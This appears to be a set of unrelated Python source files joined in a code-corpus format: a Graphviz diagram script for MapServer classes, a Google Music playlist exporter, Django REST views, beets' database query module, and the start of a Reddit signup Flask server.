http://www.graphviz.org/doc/info/shapes.html#polygon
"""
node = pydot.Node(child_id, style="filled", fillcolor=colour, label=child_label, shape="polygon", fontname=FONT)
graph.add_node(node)
graph.add_edge(pydot.Edge(parent_id, node))
def add_children(graph, parent_id, d, level=0):
blue = "#6b6bd1"
white = "#fdfefd"
green = "#33a333"
colours = [blue, white, green] * 3
for class_, children in d.items():
colour = colours[level]
child_label = class_
child_id = parent_id + "_" + class_
add_child(graph, child_id, child_label, parent_id, colour)
add_children(graph, child_id, children, level+1)
def save_file(graph, fn):
filename = "%s.png" % fn
graph.write_png(filename)
graph.write("%s.dot" % fn)
os.startfile(filename)
def main(gviz_path, layer_only=False):
graphviz_setup(gviz_path)
graph = pydot.Dot(graph_type='digraph', rankdir="TB")
layer_children = {
'CLASS': {
'LABEL': {'STYLE': {}},
'CONNECTIONOPTIONS': {},
'LEADER': {'STYLE': {}},
'STYLE': {},
'VALIDATION': {}
},
'CLUSTER': {},
'COMPOSITE': {},
'FEATURE': {'POINTS': {}},
'GRID': {},
'JOIN': {},
'METADATA': {},
'PROJECTION': {},
'SCALETOKEN': {'VALUES': {}},
'VALIDATION': {}
}
# pprint.pprint(layer_children)
classes = {
"MAP": {
"LAYER": layer_children,
'LEGEND': {'LABEL': {}},
'PROJECTION': {},
'QUERYMAP': {},
'REFERENCE': {},
'SCALEBAR': {'LABEL': {}},
'SYMBOL': {},
'WEB': {'METADATA': {}, 'VALIDATION': {}}
}
}
if layer_only:
root = "LAYER"
classes = classes["MAP"]
fn = "layer_classes"
else:
fn = "map_classes"
root, = classes.keys()
node = pydot.Node(root, style="filled", fillcolor="#33a333", label=root, fontname=FONT, shape="polygon")
graph.add_node(node)
add_children(graph, root, classes[root])
save_file(graph, fn)
if __name__ == "__main__":
gviz_path = r"C:\Program Files (x86)\Graphviz2.38\bin"
main(gviz_path, True)
main(gviz_path, False)
print("Done!")
|
soulfx/gmusic-playlist
|
ExportLists.py
|
# Author: John Elkins <john.elkins@yahoo.com>
# License: MIT <LICENSE>
from common import *
if len(sys.argv) < 2:
log('ERROR output directory is required')
time.sleep(3)
exit()
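# Example invocation (added for clarity):
#   python ExportLists.py ./exported_playlists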
# setup the output directory, create it if needed
output_dir = sys.argv[1]
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# log in and load personal library
api = open_api()
library = load_personal_library()
def playlist_handler(playlist_name, playlist_description, playlist_tracks):
# skip empty and no-name playlists
if not playlist_name: return
if len(playlist_tracks) == 0: return
# setup output files
playlist_name = playlist_name.replace('/', '')
open_log(os.path.join(output_dir,playlist_name+u'.log'))
outfile = codecs.open(os.path.join(output_dir,playlist_name+u'.csv'),
encoding='utf-8',mode='w')
# keep track of stats
stats = create_stats()
export_skipped = 0
    # keep track of song ids in case we need to skip duplicates
song_ids = []
log('')
log('============================================================')
log(u'Exporting '+ unicode(len(playlist_tracks)) +u' tracks from '
+playlist_name)
log('============================================================')
# add the playlist description as a "comment"
if playlist_description:
outfile.write(tsep)
outfile.write(playlist_description)
outfile.write(os.linesep)
for tnum, pl_track in enumerate(playlist_tracks):
track = pl_track.get('track')
        # we need to look up these tracks in the library
if not track:
library_track = [
item for item in library if item.get('id')
in pl_track.get('trackId')]
if len(library_track) == 0:
log(u'!! '+str(tnum+1)+repr(pl_track))
export_skipped += 1
continue
track = library_track[0]
result_details = create_result_details(track)
if not allow_duplicates and result_details['songid'] in song_ids:
log('{D} '+str(tnum+1)+'. '+create_details_string(result_details,True))
export_skipped += 1
continue
# update the stats
update_stats(track,stats)
# export the track
song_ids.append(result_details['songid'])
outfile.write(create_details_string(result_details))
outfile.write(os.linesep)
# calculate the stats
stats_results = calculate_stats_results(stats,len(playlist_tracks))
# output the stats to the log
log('')
log_stats(stats_results)
log(u'export skipped: '+unicode(export_skipped))
# close the files
close_log()
outfile.close()
# the personal library is used so we can look up tracks that fail to return
# info from the ...playlist_contents() call
playlist_contents = api.get_all_user_playlist_contents()
for playlist in playlist_contents:
playlist_name = playlist.get('name')
playlist_description = playlist.get('description')
playlist_tracks = playlist.get('tracks')
playlist_handler(playlist_name, playlist_description, playlist_tracks)
if export_thumbs_up:
# get thumbs up playlist
thumbs_up_tracks = []
for track in library:
if track.get('rating') is not None and int(track.get('rating')) > 1:
thumbs_up_tracks.append(track)
# modify format of each dictionary to match the data type
# of the other playlists
thumbs_up_tracks_formatted = []
for t in thumbs_up_tracks:
thumbs_up_tracks_formatted.append({'track': t})
playlist_handler('Thumbs up', 'Thumbs up tracks', thumbs_up_tracks_formatted)
if export_all:
all_tracks_formatted = []
for t in library:
all_tracks_formatted.append({'track': t})
playlist_handler('All', 'All tracks', all_tracks_formatted)
close_api()
|
nkoech/csacompendium
|
csacompendium/csa_practice/api/practicelevel/practicelevelviews.py
|
from csacompendium.csa_practice.models import PracticeLevel
from csacompendium.utils.pagination import APILimitOffsetPagination
from csacompendium.utils.permissions import IsOwnerOrReadOnly
from csacompendium.utils.viewsutils import DetailViewUpdateDelete, CreateAPIViewHook
from rest_framework.filters import DjangoFilterBackend
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from .filters import PracticeLevelListFilter
from csacompendium.csa_practice.api.practicelevel.practicelevelserializers import practice_level_serializers
def practice_level_views():
"""
Practice level views
:return: All practice level views
:rtype: Object
"""
practice_level_serializer = practice_level_serializers()
class PracticeLevelCreateAPIView(CreateAPIViewHook):
"""
Creates a single record.
"""
queryset = PracticeLevel.objects.all()
serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
permission_classes = [IsAuthenticated]
class PracticeLevelListAPIView(ListAPIView):
"""
        API list view. Gets all records.
"""
queryset = PracticeLevel.objects.all()
serializer_class = practice_level_serializer['PracticeLevelListSerializer']
filter_backends = (DjangoFilterBackend,)
filter_class = PracticeLevelListFilter
pagination_class = APILimitOffsetPagination
class PracticeLevelDetailAPIView(DetailViewUpdateDelete):
"""
Updates a record.
"""
queryset = PracticeLevel.objects.all()
serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
permission_classes = [IsAuthenticated, IsAdminUser]
lookup_field = 'slug'
return {
'PracticeLevelListAPIView': PracticeLevelListAPIView,
'PracticeLevelDetailAPIView': PracticeLevelDetailAPIView,
'PracticeLevelCreateAPIView': PracticeLevelCreateAPIView
}
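# Wiring sketch (added; typical Django REST Framework urlconf usage -- the
# URL patterns themselves are an assumption, not part of this module):
#   views = practice_level_views()
#   urlpatterns = [
#       url(r'^$', views['PracticeLevelListAPIView'].as_view()),
#       url(r'^create/$', views['PracticeLevelCreateAPIView'].as_view()),
#       url(r'^(?P<slug>[\w-]+)/$', views['PracticeLevelDetailAPIView'].as_view()),
#   ]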
|
beetbox/beets
|
beets/dbcore/query.py
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""The Query type hierarchy for DBCore.
"""
import re
from operator import mul
from beets import util
from datetime import datetime, timedelta
import unicodedata
from functools import reduce
class ParsingError(ValueError):
"""Abstract class for any unparseable user-requested album/query
specification.
"""
class InvalidQueryError(ParsingError):
"""Represent any kind of invalid query.
The query should be a unicode string or a list, which will be space-joined.
"""
def __init__(self, query, explanation):
if isinstance(query, list):
query = " ".join(query)
message = f"'{query}': {explanation}"
super().__init__(message)
class InvalidQueryArgumentValueError(ParsingError):
"""Represent a query argument that could not be converted as expected.
It exists to be caught in upper stack levels so a meaningful (i.e. with the
query) InvalidQueryError can be raised.
"""
def __init__(self, what, expected, detail=None):
message = f"'{what}' is not {expected}"
if detail:
message = f"{message}: {detail}"
super().__init__(message)
class Query:
"""An abstract class representing a query into the item database.
"""
def clause(self):
"""Generate an SQLite expression implementing the query.
Return (clause, subvals) where clause is a valid sqlite
WHERE clause implementing the query and subvals is a list of
items to be substituted for ?s in the clause.
"""
return None, ()
def match(self, item):
"""Check whether this query matches a given Item. Can be used to
perform queries on arbitrary sets of Items.
"""
raise NotImplementedError
def __repr__(self):
return f"{self.__class__.__name__}()"
def __eq__(self, other):
return type(self) == type(other)
def __hash__(self):
return 0
class FieldQuery(Query):
"""An abstract query that searches in a specific field for a
pattern. Subclasses must provide a `value_match` class method, which
determines whether a certain pattern string matches a certain value
string. Subclasses may also provide `col_clause` to implement the
same matching functionality in SQLite.
"""
def __init__(self, field, pattern, fast=True):
self.field = field
self.pattern = pattern
self.fast = fast
def col_clause(self):
return None, ()
def clause(self):
if self.fast:
return self.col_clause()
else:
# Matching a flexattr. This is a slow query.
return None, ()
@classmethod
def value_match(cls, pattern, value):
"""Determine whether the value matches the pattern. Both
arguments are strings.
"""
raise NotImplementedError()
def match(self, item):
return self.value_match(self.pattern, item.get(self.field))
def __repr__(self):
return ("{0.__class__.__name__}({0.field!r}, {0.pattern!r}, "
"{0.fast})".format(self))
def __eq__(self, other):
return super().__eq__(other) and \
self.field == other.field and self.pattern == other.pattern
def __hash__(self):
return hash((self.field, hash(self.pattern)))
class MatchQuery(FieldQuery):
"""A query that looks for exact matches in an item field."""
def col_clause(self):
return self.field + " = ?", [self.pattern]
@classmethod
def value_match(cls, pattern, value):
return pattern == value
class NoneQuery(FieldQuery):
"""A query that checks whether a field is null."""
def __init__(self, field, fast=True):
super().__init__(field, None, fast)
def col_clause(self):
return self.field + " IS NULL", ()
def match(self, item):
return item.get(self.field) is None
def __repr__(self):
return "{0.__class__.__name__}({0.field!r}, {0.fast})".format(self)
class StringFieldQuery(FieldQuery):
"""A FieldQuery that converts values to strings before matching
them.
"""
@classmethod
def value_match(cls, pattern, value):
"""Determine whether the value matches the pattern. The value
may have any type.
"""
return cls.string_match(pattern, util.as_string(value))
@classmethod
def string_match(cls, pattern, value):
"""Determine whether the value matches the pattern. Both
arguments are strings. Subclasses implement this method.
"""
raise NotImplementedError()
class StringQuery(StringFieldQuery):
"""A query that matches a whole string in a specific item field."""
def col_clause(self):
search = (self.pattern
.replace('\\', '\\\\')
.replace('%', '\\%')
.replace('_', '\\_'))
clause = self.field + " like ? escape '\\'"
subvals = [search]
return clause, subvals
@classmethod
def string_match(cls, pattern, value):
return pattern.lower() == value.lower()
class SubstringQuery(StringFieldQuery):
"""A query that matches a substring in a specific item field."""
def col_clause(self):
pattern = (self.pattern
.replace('\\', '\\\\')
.replace('%', '\\%')
.replace('_', '\\_'))
search = '%' + pattern + '%'
clause = self.field + " like ? escape '\\'"
subvals = [search]
return clause, subvals
@classmethod
def string_match(cls, pattern, value):
return pattern.lower() in value.lower()
class RegexpQuery(StringFieldQuery):
"""A query that matches a regular expression in a specific item
field.
Raises InvalidQueryError when the pattern is not a valid regular
expression.
"""
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
        pattern = self._normalize(pattern)
        try:
            # Compile the normalized pattern so it matches the
            # NFC-normalized values produced by string_match.
            self.pattern = re.compile(pattern)
except re.error as exc:
# Invalid regular expression.
raise InvalidQueryArgumentValueError(pattern,
"a regular expression",
format(exc))
@staticmethod
def _normalize(s):
"""Normalize a Unicode string's representation (used on both
patterns and matched values).
"""
return unicodedata.normalize('NFC', s)
@classmethod
def string_match(cls, pattern, value):
return pattern.search(cls._normalize(value)) is not None
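# Illustrative sketch (not part of the original module): both pattern and
# value are NFC-normalized, so composed and decomposed Unicode spellings
# compare equal. string_match expects an already-compiled pattern, as
# produced by __init__ above.
def _demo_regexp_query():
    pattern = re.compile('voil\u00e0')  # 'voilà', composed form
    value = 'voila\u0300'  # 'voilà', decomposed form
    return RegexpQuery.string_match(pattern, value)  # True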
class BooleanQuery(MatchQuery):
"""Matches a boolean field. Pattern should either be a boolean or a
string reflecting a boolean.
"""
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
if isinstance(pattern, str):
self.pattern = util.str2bool(pattern)
self.pattern = int(self.pattern)
class BytesQuery(MatchQuery):
"""Match a raw bytes field (i.e., a path). This is a necessary hack
to work around the `sqlite3` module's desire to treat `bytes` and
`unicode` equivalently in Python 2. Always use this query instead of
`MatchQuery` when matching on BLOB values.
"""
def __init__(self, field, pattern):
super().__init__(field, pattern)
# Use a buffer/memoryview representation of the pattern for SQLite
# matching. This instructs SQLite to treat the blob as binary
# rather than encoded Unicode.
if isinstance(self.pattern, (str, bytes)):
if isinstance(self.pattern, str):
self.pattern = self.pattern.encode('utf-8')
self.buf_pattern = memoryview(self.pattern)
elif isinstance(self.pattern, memoryview):
self.buf_pattern = self.pattern
self.pattern = bytes(self.pattern)
def col_clause(self):
return self.field + " = ?", [self.buf_pattern]
class NumericQuery(FieldQuery):
"""Matches numeric fields. A syntax using Ruby-style range ellipses
(``..``) lets users specify one- or two-sided ranges. For example,
``year:2001..`` finds music released since the turn of the century.
Raises InvalidQueryError when the pattern does not represent an int or
a float.
"""
def _convert(self, s):
"""Convert a string to a numeric type (float or int).
Return None if `s` is empty.
Raise an InvalidQueryError if the string cannot be converted.
"""
# This is really just a bit of fun premature optimization.
if not s:
return None
try:
return int(s)
except ValueError:
try:
return float(s)
except ValueError:
raise InvalidQueryArgumentValueError(s, "an int or a float")
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
parts = pattern.split('..', 1)
if len(parts) == 1:
# No range.
self.point = self._convert(parts[0])
self.rangemin = None
self.rangemax = None
else:
# One- or two-sided range.
self.point = None
self.rangemin = self._convert(parts[0])
self.rangemax = self._convert(parts[1])
def match(self, item):
if self.field not in item:
return False
value = item[self.field]
if isinstance(value, str):
value = self._convert(value)
if self.point is not None:
return value == self.point
else:
if self.rangemin is not None and value < self.rangemin:
return False
if self.rangemax is not None and value > self.rangemax:
return False
return True
def col_clause(self):
if self.point is not None:
return self.field + '=?', (self.point,)
else:
if self.rangemin is not None and self.rangemax is not None:
return ('{0} >= ? AND {0} <= ?'.format(self.field),
(self.rangemin, self.rangemax))
elif self.rangemin is not None:
return f'{self.field} >= ?', (self.rangemin,)
elif self.rangemax is not None:
return f'{self.field} <= ?', (self.rangemax,)
else:
return '1', ()
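# Illustrative sketch (not part of the original module): the '..' syntax
# in action. A bare value matches exactly; an open-ended range only
# constrains one side.
def _demo_numeric_query():
    exact = NumericQuery('year', '2001')
    since = NumericQuery('year', '2001..')
    assert exact.col_clause() == ('year=?', (2001,))
    assert since.col_clause() == ('year >= ?', (2001,))
    assert since.match({'year': 2010})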
class CollectionQuery(Query):
"""An abstract query class that aggregates other queries. Can be
indexed like a list to access the sub-queries.
"""
def __init__(self, subqueries=()):
self.subqueries = subqueries
# Act like a sequence.
def __len__(self):
return len(self.subqueries)
def __getitem__(self, key):
return self.subqueries[key]
def __iter__(self):
return iter(self.subqueries)
def __contains__(self, item):
return item in self.subqueries
def clause_with_joiner(self, joiner):
"""Return a clause created by joining together the clauses of
all subqueries with the string joiner (padded by spaces).
"""
clause_parts = []
subvals = []
for subq in self.subqueries:
subq_clause, subq_subvals = subq.clause()
if not subq_clause:
# Fall back to slow query.
return None, ()
clause_parts.append('(' + subq_clause + ')')
subvals += subq_subvals
clause = (' ' + joiner + ' ').join(clause_parts)
return clause, subvals
def __repr__(self):
return "{0.__class__.__name__}({0.subqueries!r})".format(self)
def __eq__(self, other):
return super().__eq__(other) and \
self.subqueries == other.subqueries
def __hash__(self):
"""Since subqueries are mutable, this object should not be hashable.
However and for conveniences purposes, it can be hashed.
"""
return reduce(mul, map(hash, self.subqueries), 1)
class AnyFieldQuery(CollectionQuery):
"""A query that matches if a given FieldQuery subclass matches in
any field. The individual field query class is provided to the
constructor.
"""
def __init__(self, pattern, fields, cls):
self.pattern = pattern
self.fields = fields
self.query_class = cls
subqueries = []
for field in self.fields:
subqueries.append(cls(field, pattern, True))
super().__init__(subqueries)
def clause(self):
return self.clause_with_joiner('or')
def match(self, item):
for subq in self.subqueries:
if subq.match(item):
return True
return False
def __repr__(self):
return ("{0.__class__.__name__}({0.pattern!r}, {0.fields!r}, "
"{0.query_class.__name__})".format(self))
def __eq__(self, other):
return super().__eq__(other) and \
self.query_class == other.query_class
def __hash__(self):
return hash((self.pattern, tuple(self.fields), self.query_class))
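# Illustrative sketch (not part of the original module): one pattern is
# fanned out over several fields and the per-field clauses are OR-ed.
def _demo_any_field_query():
    q = AnyFieldQuery('beatles', ['artist', 'albumartist'], SubstringQuery)
    clause, subvals = q.clause()
    # clause:  "(artist like ? escape '\\') or (albumartist like ? escape '\\')"
    # subvals: ['%beatles%', '%beatles%']
    return clause, subvals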
class MutableCollectionQuery(CollectionQuery):
"""A collection query whose subqueries may be modified after the
query is initialized.
"""
def __setitem__(self, key, value):
self.subqueries[key] = value
def __delitem__(self, key):
del self.subqueries[key]
class AndQuery(MutableCollectionQuery):
"""A conjunction of a list of other queries."""
def clause(self):
return self.clause_with_joiner('and')
def match(self, item):
return all(q.match(item) for q in self.subqueries)
class OrQuery(MutableCollectionQuery):
"""A conjunction of a list of other queries."""
def clause(self):
return self.clause_with_joiner('or')
def match(self, item):
return any(q.match(item) for q in self.subqueries)
class NotQuery(Query):
"""A query that matches the negation of its `subquery`, as a shorcut for
performing `not(subquery)` without using regular expressions.
"""
def __init__(self, subquery):
self.subquery = subquery
def clause(self):
clause, subvals = self.subquery.clause()
if clause:
return f'not ({clause})', subvals
else:
# If there is no clause, there is nothing to negate. All the logic
# is handled by match() for slow queries.
return clause, subvals
def match(self, item):
return not self.subquery.match(item)
def __repr__(self):
return "{0.__class__.__name__}({0.subquery!r})".format(self)
def __eq__(self, other):
return super().__eq__(other) and \
self.subquery == other.subquery
def __hash__(self):
return hash(('not', hash(self.subquery)))
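# Illustrative sketch (not part of the original module): composing fast
# queries keeps the whole expression fast, since every sub-clause is
# combined in SQL rather than matched in Python.
def _demo_composed_queries():
    q = AndQuery([
        NumericQuery('year', '1990..1999'),
        NotQuery(MatchQuery('genre', 'pop')),
    ])
    clause, subvals = q.clause()
    # clause:  "(year >= ? AND year <= ?) and (not (genre = ?))"
    # subvals: [1990, 1999, 'pop']
    return clause, subvals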
class TrueQuery(Query):
"""A query that always matches."""
def clause(self):
return '1', ()
def match(self, item):
return True
class FalseQuery(Query):
"""A query that never matches."""
def clause(self):
return '0', ()
def match(self, item):
return False
# Time/date queries.
def _to_epoch_time(date):
"""Convert a `datetime` object to an integer number of seconds since
the (local) Unix epoch.
"""
if hasattr(date, 'timestamp'):
# The `timestamp` method exists on Python 3.3+.
return int(date.timestamp())
else:
epoch = datetime.fromtimestamp(0)
delta = date - epoch
return int(delta.total_seconds())
def _parse_periods(pattern):
"""Parse a string containing two dates separated by two dots (..).
Return a pair of `Period` objects.
"""
parts = pattern.split('..', 1)
if len(parts) == 1:
instant = Period.parse(parts[0])
return (instant, instant)
else:
start = Period.parse(parts[0])
end = Period.parse(parts[1])
return (start, end)
class Period:
"""A period of time given by a date, time and precision.
Example: 2014-01-01 10:50:30 with precision 'month' represents all
instants of time during January 2014.
"""
precisions = ('year', 'month', 'day', 'hour', 'minute', 'second')
date_formats = (
('%Y',), # year
('%Y-%m',), # month
('%Y-%m-%d',), # day
('%Y-%m-%dT%H', '%Y-%m-%d %H'), # hour
('%Y-%m-%dT%H:%M', '%Y-%m-%d %H:%M'), # minute
('%Y-%m-%dT%H:%M:%S', '%Y-%m-%d %H:%M:%S') # second
)
relative_units = {'y': 365, 'm': 30, 'w': 7, 'd': 1}
    relative_re = '(?P<sign>[+-]?)(?P<quantity>[0-9]+)' + \
                  '(?P<timespan>[ymwd])'
def __init__(self, date, precision):
"""Create a period with the given date (a `datetime` object) and
precision (a string, one of "year", "month", "day", "hour", "minute",
or "second").
"""
if precision not in Period.precisions:
raise ValueError(f'Invalid precision {precision}')
self.date = date
self.precision = precision
@classmethod
def parse(cls, string):
"""Parse a date and return a `Period` object or `None` if the
string is empty, or raise an InvalidQueryArgumentValueError if
the string cannot be parsed to a date.
The date may be absolute or relative. Absolute dates look like
`YYYY`, or `YYYY-MM-DD`, or `YYYY-MM-DD HH:MM:SS`, etc. Relative
dates have three parts:
- Optionally, a ``+`` or ``-`` sign indicating the future or the
past. The default is the future.
- A number: how much to add or subtract.
- A letter indicating the unit: days, weeks, months or years
(``d``, ``w``, ``m`` or ``y``). A "month" is exactly 30 days
and a "year" is exactly 365 days.
"""
def find_date_and_format(string):
            for ordinal, date_format in enumerate(cls.date_formats):
                for format_option in date_format:
                    try:
                        date = datetime.strptime(string, format_option)
                        return date, ordinal
except ValueError:
# Parsing failed.
pass
return (None, None)
if not string:
return None
# Check for a relative date.
match_dq = re.match(cls.relative_re, string)
if match_dq:
sign = match_dq.group('sign')
quantity = match_dq.group('quantity')
timespan = match_dq.group('timespan')
# Add or subtract the given amount of time from the current
# date.
multiplier = -1 if sign == '-' else 1
days = cls.relative_units[timespan]
date = datetime.now() + \
timedelta(days=int(quantity) * days) * multiplier
return cls(date, cls.precisions[5])
# Check for an absolute date.
date, ordinal = find_date_and_format(string)
if date is None:
raise InvalidQueryArgumentValueError(string,
'a valid date/time string')
precision = cls.precisions[ordinal]
return cls(date, precision)
def open_right_endpoint(self):
"""Based on the precision, convert the period to a precise
`datetime` for use as a right endpoint in a right-open interval.
"""
precision = self.precision
date = self.date
        if 'year' == precision:
            return date.replace(year=date.year + 1, month=1)
        elif 'month' == precision:
            if date.month < 12:
                return date.replace(month=date.month + 1)
            else:
                return date.replace(year=date.year + 1, month=1)
elif 'day' == precision:
return date + timedelta(days=1)
elif 'hour' == precision:
return date + timedelta(hours=1)
elif 'minute' == precision:
return date + timedelta(minutes=1)
elif 'second' == precision:
return date + timedelta(seconds=1)
else:
raise ValueError(f'unhandled precision {precision}')
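# Illustrative sketch (not part of the original module): parsing picks the
# coarsest precision that fits the string, while relative strings are
# resolved against the current time at second precision.
def _demo_period_parse():
    month = Period.parse('2014-01')  # precision 'month'
    ago = Period.parse('-2w')  # two weeks before now, precision 'second'
    start, end = _parse_periods('2014..2015-06')
    # -> ('month', 'second', 'year', 'month')
    return month.precision, ago.precision, start.precision, end.precision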
class DateInterval:
"""A closed-open interval of dates.
A left endpoint of None means since the beginning of time.
A right endpoint of None means towards infinity.
"""
def __init__(self, start, end):
if start is not None and end is not None and not start < end:
raise ValueError("start date {} is not before end date {}"
.format(start, end))
self.start = start
self.end = end
@classmethod
def from_periods(cls, start, end):
"""Create an interval with two Periods as the endpoints.
"""
end_date = end.open_right_endpoint() if end is not None else None
start_date = start.date if start is not None else None
return cls(start_date, end_date)
def contains(self, date):
if self.start is not None and date < self.start:
return False
if self.end is not None and date >= self.end:
return False
return True
def __str__(self):
return f'[{self.start}, {self.end})'
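# Illustrative sketch (not part of the original module): a month-precision
# period becomes a half-open interval covering the entire month.
def _demo_date_interval():
    period = Period.parse('2014-01')
    interval = DateInterval.from_periods(period, period)
    assert interval.contains(datetime(2014, 1, 31, 23, 59))
    assert not interval.contains(datetime(2014, 2, 1))
    return interval  # [2014-01-01 00:00:00, 2014-02-01 00:00:00)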
class DateQuery(FieldQuery):
"""Matches date fields stored as seconds since Unix epoch time.
Dates can be specified as ``year-month-day`` strings where only year
is mandatory.
The value of a date field can be matched against a date interval by
using an ellipsis interval syntax similar to that of NumericQuery.
"""
def __init__(self, field, pattern, fast=True):
super().__init__(field, pattern, fast)
start, end = _parse_periods(pattern)
self.interval = DateInterval.from_periods(start, end)
def match(self, item):
if self.field not in item:
return False
timestamp = float(item[self.field])
date = datetime.fromtimestamp(timestamp)
return self.interval.contains(date)
_clause_tmpl = "{0} {1} ?"
def col_clause(self):
clause_parts = []
subvals = []
if self.interval.start:
clause_parts.append(self._clause_tmpl.format(self.field, ">="))
subvals.append(_to_epoch_time(self.interval.start))
if self.interval.end:
clause_parts.append(self._clause_tmpl.format(self.field, "<"))
subvals.append(_to_epoch_time(self.interval.end))
if clause_parts:
# One- or two-sided interval.
clause = ' AND '.join(clause_parts)
else:
# Match any date.
clause = '1'
return clause, subvals
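# Illustrative sketch (not part of the original module): the parsed
# interval is translated into epoch-second bounds with a half-open right
# end, matching DateInterval semantics.
def _demo_date_query():
    q = DateQuery('added', '2008..2010')
    clause, subvals = q.col_clause()
    # clause:  'added >= ? AND added < ?'
    # subvals: epoch seconds for 2008-01-01 and 2011-01-01
    return clause, subvals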
class DurationQuery(NumericQuery):
"""NumericQuery that allow human-friendly (M:SS) time interval formats.
Converts the range(s) to a float value, and delegates on NumericQuery.
Raises InvalidQueryError when the pattern does not represent an int, float
or M:SS time interval.
"""
def _convert(self, s):
"""Convert a M:SS or numeric string to a float.
Return None if `s` is empty.
Raise an InvalidQueryError if the string cannot be converted.
"""
if not s:
return None
try:
return util.raw_seconds_short(s)
except ValueError:
try:
return float(s)
except ValueError:
raise InvalidQueryArgumentValueError(
s,
"a M:SS string or a float")
# Sorting.
class Sort:
"""An abstract class representing a sort operation for a query into
the item database.
"""
def order_clause(self):
"""Generates a SQL fragment to be used in a ORDER BY clause, or
None if no fragment is used (i.e., this is a slow sort).
"""
return None
def sort(self, items):
"""Sort the list of objects and return a list.
"""
return sorted(items)
def is_slow(self):
"""Indicate whether this query is *slow*, meaning that it cannot
be executed in SQL and must be executed in Python.
"""
return False
def __hash__(self):
return 0
def __eq__(self, other):
return type(self) == type(other)
class MultipleSort(Sort):
"""Sort that encapsulates multiple sub-sorts.
"""
def __init__(self, sorts=None):
self.sorts = sorts or []
def add_sort(self, sort):
self.sorts.append(sort)
def _sql_sorts(self):
"""Return the list of sub-sorts for which we can be (at least
partially) fast.
        A contiguous suffix of fast (SQL-capable) sub-sorts is
        executable in SQL. The remaining sub-sorts, even if they are
        fast independently, must be executed slowly.
"""
sql_sorts = []
for sort in reversed(self.sorts):
if not sort.order_clause() is None:
sql_sorts.append(sort)
else:
break
sql_sorts.reverse()
return sql_sorts
def order_clause(self):
order_strings = []
for sort in self._sql_sorts():
order = sort.order_clause()
order_strings.append(order)
return ", ".join(order_strings)
def is_slow(self):
for sort in self.sorts:
if sort.is_slow():
return True
return False
def sort(self, items):
slow_sorts = []
switch_slow = False
for sort in reversed(self.sorts):
if switch_slow:
slow_sorts.append(sort)
elif sort.order_clause() is None:
switch_slow = True
slow_sorts.append(sort)
else:
pass
for sort in slow_sorts:
items = sort.sort(items)
return items
def __repr__(self):
return f'MultipleSort({self.sorts!r})'
def __hash__(self):
return hash(tuple(self.sorts))
def __eq__(self, other):
return super().__eq__(other) and \
self.sorts == other.sorts
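# Illustrative sketch (not part of the original module): only a contiguous
# suffix of SQL-capable sub-sorts can run in the database; sub-sorts before
# the first slow one are re-applied in Python, relying on sorted() being
# stable to preserve the SQL tiebreak.
def _demo_multiple_sort():
    s = MultipleSort([SlowFieldSort('rating'), FixedFieldSort('album')])
    assert s.is_slow()
    # order_clause() covers only the trailing FixedFieldSort('album');
    # SlowFieldSort('rating') is applied afterwards by sort() in Python.
    return s.order_clause()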
class FieldSort(Sort):
"""An abstract sort criterion that orders by a specific field (of
any kind).
"""
def __init__(self, field, ascending=True, case_insensitive=True):
self.field = field
self.ascending = ascending
self.case_insensitive = case_insensitive
def sort(self, objs):
# TODO: Conversion and null-detection here. In Python 3,
# comparisons with None fail. We should also support flexible
# attributes with different types without falling over.
def key(item):
field_val = item.get(self.field, '')
if self.case_insensitive and isinstance(field_val, str):
field_val = field_val.lower()
return field_val
return sorted(objs, key=key, reverse=not self.ascending)
def __repr__(self):
return '<{}: {}{}>'.format(
type(self).__name__,
self.field,
'+' if self.ascending else '-',
)
def __hash__(self):
return hash((self.field, self.ascending))
def __eq__(self, other):
return super().__eq__(other) and \
self.field == other.field and \
self.ascending == other.ascending
class FixedFieldSort(FieldSort):
"""Sort object to sort on a fixed field.
"""
def order_clause(self):
order = "ASC" if self.ascending else "DESC"
if self.case_insensitive:
field = '(CASE ' \
'WHEN TYPEOF({0})="text" THEN LOWER({0}) ' \
'WHEN TYPEOF({0})="blob" THEN LOWER({0}) ' \
'ELSE {0} END)'.format(self.field)
else:
field = self.field
return f"{field} {order}"
class SlowFieldSort(FieldSort):
"""A sort criterion by some model field other than a fixed field:
i.e., a computed or flexible field.
"""
def is_slow(self):
return True
class NullSort(Sort):
"""No sorting. Leave results unsorted."""
def sort(self, items):
return items
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return False
def __eq__(self, other):
return type(self) == type(other) or other is None
def __hash__(self):
return 0
|
foobarbazblarg/stayclean
|
stayclean-2018-march/serve-signups-with-flask.py
|
#!/usr/bin/env python
import subprocess
import praw
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection
reload(sys)
sys.setdefaultencoding('utf8')
# Edit Me!
# Each day after you post a signup post, copy its 6-character ID to this array.
signupPageSubmissionIds = [ '7zrrj1', '7zxkpq', '8055hn', '80ddrf', '80nbm1', '80waq3' ]
flaskport = 8993
app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}
def loginAndReturnRedditSession():
config = ConfigParser()
config.read("../reddit-password-credentials.cfg")
user = config.get("Reddit", "user")
password = config.get("Reddit", "password")
# TODO: password auth is going away, and we will soon need to do oauth.
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
redditSession.login(user, password, disable_warning=True)
# submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
# print [str(x) for x in submissions]
return redditSession
def loginOAuthAndReturnRedditSession():
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
